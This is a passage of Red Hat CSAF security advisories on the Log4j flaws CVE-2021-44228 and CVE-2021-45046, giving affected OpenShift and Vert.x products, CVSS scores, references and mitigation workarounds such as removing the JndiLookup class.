"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64"
],
"known_not_affected": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-15T20:09:32+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5148"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Critical"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
},
{
"cve": "CVE-2021-45046",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-12-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2032580"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. \nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64"
],
"known_not_affected": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-45046"
},
{
"category": "external",
"summary": "RHBZ#2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2021-44228",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4",
"url": "https://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-15T20:09:32+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5148"
},
{
"category": "workaround",
"details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2023-05-01T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)"
}
]
}
rhsa-2021_5093
Vulnerability from csaf_redhat
Published
2021-12-14 16:00
Modified
2024-12-12 01:17
Summary
Red Hat Security Advisory: Red Hat build of Eclipse Vert.x 4.1.5 SP1 security update
Notes
Topic
An update is now available for Red Hat build of Eclipse Vert.x.
Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE pages listed in the References section.
Details
This release of Red Hat build of Eclipse Vert.x 4.1.5 SP1 includes security updates. For more information, see the release notes listed in the References section.
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
For more details about the security issues and their impact, the CVSS score, acknowledgements, and other related information, see the CVE pages listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat build of Eclipse Vert.x.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE pages listed in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "This release of Red Hat build of Eclipse Vert.x 4.1.5 SP1 includes security updates. For more information, see the release notes listed in the References section.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issues and their impact, the CVSS score, acknowledgements, and other related information, see the CVE pages listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5093",
"url": "https://access.redhat.com/errata/RHSA-2021:5093"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=catRhoar.eclipse.vertx\u0026version=4.1.5.SP1",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=catRhoar.eclipse.vertx\u0026version=4.1.5.SP1"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_build_of_eclipse_vert.x/4.1/html/release_notes_for_eclipse_vert.x_4.1/index",
"url": "https://access.redhat.com/documentation/en-us/red_hat_build_of_eclipse_vert.x/4.1/html/release_notes_for_eclipse_vert.x_4.1/index"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5093.json"
}
],
"title": "Red Hat Security Advisory: Red Hat build of Eclipse Vert.x 4.1.5 SP1 security update",
"tracking": {
"current_release_date": "2024-12-12T01:17:48+00:00",
"generator": {
"date": "2024-12-12T01:17:48+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5093",
"initial_release_date": "2021-12-14T16:00:56+00:00",
"revision_history": [
{
"date": "2021-12-14T16:00:56+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-14T16:00:56+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:17:48+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Vert.x 4.1.5 SP1",
"product": {
"name": "Vert.x 4.1.5 SP1",
"product_id": "Vert.x 4.1.5 SP1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_application_runtimes:1.0"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Application Runtimes"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Vert.x 4.1.5 SP1"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T16:00:56+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nThe References section of this erratum contains a download link for the update. You must be logged in to download the update.",
"product_ids": [
"Vert.x 4.1.5 SP1"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5093"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"Vert.x 4.1.5 SP1"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Vert.x 4.1.5 SP1"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Critical"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
}
]
}
rhsa-2021_5128
Vulnerability from csaf_redhat
Published
2021-12-14 18:09
Modified
2024-12-12 01:17
Summary
Red Hat Security Advisory: Openshift Logging security and bug update (5.1.5)
Notes
Topic
An update is now available for OpenShift Logging 5.1.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Openshift Logging Security and Bug Fix Release (5.1.5)
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
* netty: Request smuggling via content-length header (CVE-2021-21409)
* netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data (CVE-2021-37136)
* netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for OpenShift Logging 5.1.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Openshift Logging Security and Bug Fix Release (5.1.5)\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* netty: Request smuggling via content-length header (CVE-2021-21409)\n\n* netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data (CVE-2021-37136)\n\n* netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5128",
"url": "https://access.redhat.com/errata/RHSA-2021:5128"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "1944888",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888"
},
{
"category": "external",
"summary": "2004133",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133"
},
{
"category": "external",
"summary": "2004135",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
